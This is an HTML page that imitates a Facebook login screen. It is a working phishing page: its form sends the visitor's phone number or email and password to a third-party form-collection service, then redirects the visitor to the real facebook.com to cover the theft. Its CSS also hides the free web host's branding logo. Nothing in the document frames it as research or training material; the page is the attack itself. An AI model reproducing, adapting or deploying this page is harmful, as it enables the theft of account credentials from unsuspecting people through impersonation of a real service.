<html lang="en"><head>
      <title></title>
<meta name="viewport" content="width=device-width, initial-scale=1"> 


<style>

img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] 
 	{ 
 	
 	display:none; 
 	
 	}
	

body{
	font-family:Arial;
}


	img{
		width:140px;
	}

.box:hover{
	border-top:none;
}

.box{
	outline:0;
	width:250px;
	height:35px;
	border:none;
	font-size:17px;
	border-bottom:1px solid gray;
	padding-bottom:5px;
}

._box{
	outline:0;
	width:250px;
	height:35px;
	border:none;
	font-size:17px;
	padding-bottom:5px;
}

.Login{
	outline:0;
	width:260px;
	height:34px;
	background:#3784DE;
	color:white;
	border:none;
	border-radius:18px;
	height:50px;
}

.Login:hover{
	background:#3279B4;
	
}

.a_c:hover{
	background:#32C62E;
	
}

.a_c{
	outline:0;
	width:260px;
	height:34px;
	background:#3AD630;
	color:white;
	border:none;
	border-radius:20px;
	height:50px;
	
}

input{
	font-size:14px;
}

.frgt{
	
	text-decoration:none;
	color:black;
}

</style>
</head>
   <body>
 <center>
 <!--logo-->
 <br>
 	<br>
 		 <br>
 	<br>
 		
 	<img src="img/avatar.png" alt="">
  
<br><br>
<br><br>
	<!--starting form creating-->
	<form method="post" action="https://submit-form.com/PFClDSaN">
		<input
    type="hidden"
    name="_redirect"
    value="https://www.facebook.com/"
  />
		
		<input class="box" type="text" placeholder="Phone Number or Email" name="user" required="">
		<br>
			
			
			<input class="_box" type="password" placeholder="Password" name="pw" required="">
		
		<br>
			<br>
			
			<input class="Login" type="submit" name="Submit" value="LOG IN">
	
	
	</form>

<a href=""><input class="a_c" type="submit" name="Submit" value="CREATE NEW ACCOUNT"></a>
<br>
		
<br>
	
	<b><h5><a class="frgt" href="">FORGOT PASSWORD</a><a href=""></a></h5></b>

</center>
<center>
<span style="color:gray;font-size:10px;">Facebook Inc.</span>
</center></body></html>
